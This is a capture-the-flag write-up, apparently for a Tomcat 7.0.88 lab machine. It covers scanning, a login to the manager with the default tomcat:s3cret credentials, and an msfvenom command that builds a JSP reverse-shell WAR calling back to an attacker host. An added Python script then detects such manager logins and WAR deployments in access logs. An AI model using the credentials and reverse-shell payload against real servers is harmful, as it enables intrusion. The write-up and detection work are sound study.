# Nmap 7.70 scan initiated Sat Jul 6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds
Port 8080 hosted a default installation of Apache Tomcat (7.0.88). That build dates from May 2018, and Searchsploit had no exploits for it.
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
The manager one seemed interesting; when I hit the URL it asked for credentials. I tried the default Tomcat credentials tomcat:s3cret and they worked.
User Own & Root Own
An option to deploy my own WAR file was available, so I built a reverse shell for the server using msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war
The shell was uploaded, and once its URL was hit I got a reverse shell as NT AUTHORITY\SYSTEM.
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,598,893,056 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***
root.txt
04a8b***
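From the defender's side, every step of this chain (the failed and then successful manager logins with the default tomcat:s3cret account, and the WAR upload through the HTML manager) lands in Tomcat's access log. The script below is an added example, not part of the original writeup: it parses constructed access-log lines in Tomcat's default AccessLogValve format and flags manager logins from untrusted addresses, WAR deployments via /manager/html/upload or /manager/text/deploy, and repeated 401s. The IPs mirror the page; the log lines and the CSRF nonce value are made up.

```python
import re
from collections import Counter

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample log (not real captured data); nonce is a placeholder.
SAMPLE_LOG = """\
10.10.14.7 - - [06/Jul/2019:13:31:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [06/Jul/2019:13:31:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - tomcat [06/Jul/2019:13:31:21 +0000] "GET /manager/html HTTP/1.1" 200 16873
10.10.14.7 - tomcat [06/Jul/2019:13:33:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 17012
10.10.14.7 - - [06/Jul/2019:13:33:55 +0000] "GET /shell/ HTTP/1.1" 200 -
127.0.0.1 - admin [06/Jul/2019:09:00:00 +0000] "GET /manager/html HTTP/1.1" 200 16873
"""

def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_deploy(rec):
    """True for the HTML manager upload form or the text manager deploy endpoint."""
    return (rec["method"] == "POST" and rec["path"].startswith("/manager/html/upload")) or \
           (rec["method"] == "PUT" and rec["path"].startswith("/manager/text/deploy"))

def analyse(log_text, trusted_ips=("127.0.0.1",)):
    """Return (severity, message) findings for Tomcat manager activity in the log."""
    findings = []
    failed_auth = Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        if rec["status"] == "401":
            failed_auth[rec["ip"]] += 1          # auth failure: count per source
        elif rec["status"] == "200":
            if is_deploy(rec):                   # a successful WAR deployment
                findings.append(("high", f"WAR deployment by '{rec['user']}' from {rec['ip']}"))
            elif rec["ip"] not in trusted_ips:   # manager UI opened from an untrusted host
                findings.append(("medium", f"manager login as '{rec['user']}' from untrusted {rec['ip']}"))
    for ip, n in failed_auth.items():
        if n >= 2:
            findings.append(("low", f"{n} failed manager logins from {ip}"))
    return findings

if __name__ == "__main__":
    for sev, msg in analyse(SAMPLE_LOG):
        print(f"[{sev}] {msg}")
```

Restricting the manager to trusted addresses with Tomcat's RemoteAddrValve, and changing or removing the stock tomcat-users.xml account, would have prevented the medium and high findings rather than merely logging them.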
Learning Outcome
Whenever you get a shell, check who you are before running around enumerating the server. In this case it took me quite a while to understand that I had been running as root since the beginning.